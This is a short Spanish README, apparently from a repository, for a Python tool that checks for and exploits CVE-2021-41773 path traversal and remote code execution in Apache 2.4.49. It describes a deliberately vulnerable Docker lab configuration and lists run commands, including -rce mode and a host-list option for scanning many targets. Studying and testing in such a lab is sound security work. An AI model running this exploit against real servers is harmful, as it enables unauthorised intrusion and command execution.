
cve-2021-41773.py es un script de Python que ayudará a detectar vulnerabilidades de Path Traversal o de Ejecución remota de código en Apache 2.4.49
cve-2021-41773.py es un script de Python que te ayudará a encontrar la vulnerabilidad de Path Traversal o Ejecución Remota de Código en Apache 2.4.49. Se proporciona una instancia vulnerable de Docker para que te pongas manos a la obra con CVE-2021-41773.
Si CGI-BIN está habilitado, podemos realizar Ejecución Remota de Código pero no Path Traversal, por lo que se ha añadido el directorio "icons" en la sección Alias de httpd.conf para comprobar la vulnerabilidad de Path Traversal.
1. Enable CGI-BIN
2. Add "icons" directory in Alias section
3. <Directory>Require all granted</Directory>
$ docker build -t cve-2021-41773 .
$ docker run -it cve-2021-41773
$ python3 cve-2021-41773.py -u http://172.17.0.2
$ python3 cve-2021-41773.py -u http://172.17.0.2 -pt
$ python3 cve-2021-41773.py -u http://172.17.0.2 -rce
$ python3 cve-2021-41773.py -l list.txt
$ python3 cve-2021-41773.py -l list.txt -pt
$ python3 cve-2021-41773.py -l list.txt -rce
Puedes encontrar más información aquí.